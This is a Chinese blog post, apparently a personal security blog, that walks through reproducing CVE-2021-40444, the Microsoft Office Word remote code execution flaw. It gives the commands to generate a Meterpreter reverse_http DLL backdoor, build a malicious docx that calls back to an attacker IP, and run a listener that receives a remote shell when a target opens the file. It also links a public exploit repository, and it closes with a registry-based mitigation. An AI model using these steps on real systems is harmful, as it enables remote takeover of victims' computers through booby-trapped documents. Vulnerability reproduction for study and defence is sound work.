【漏洞复现】Microsoft文档CVE-2021-40444

前言

  • 恶意 docx 生成器利用 CVE-2021-40444(Microsoft Office Word 远程代码执行)

测试环境

  • windows 10
  • Office 2019word
  • kali

简单复现exp方法

一、这个需要一个依赖lcab

1
apt-get install lcab

二、这个exp中是利用dll的,所以我们生成一个后门,这里用80以外的端口就行

1
2
3
4
use payload/windows/x64/meterpreter/reverse_http

接着生成为dll形式
generate -f dll -o http.dll

image-20210916183359206

三、exp生成攻击word文档

1
python3 exploit.py generate http.dll http://192.168.1.104

image-20210916174436033

四、接着在你kali上使用exp来监听mhtml会访问的80端口

image-20210916180330837

五、msf使用下面命令监听,然后将out/document.docx文件放入目标机中运行就成功上线了

1
handler -x -H 192.168.1.104 -P 8080 -p windows/x64/meterpreter/reverse_http

image-20210916182549483

临时解决方案

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
创建一个reg文件,输入以下内容并且执行

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

explit下载

https://github.com/lockedbyte/CVE-2021-40444

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【漏洞复现】Microsoft文档CVE-2021-40444

文章作者:孤桜懶契

发布时间:2021年09月16日 - 15:21:59

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/142.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------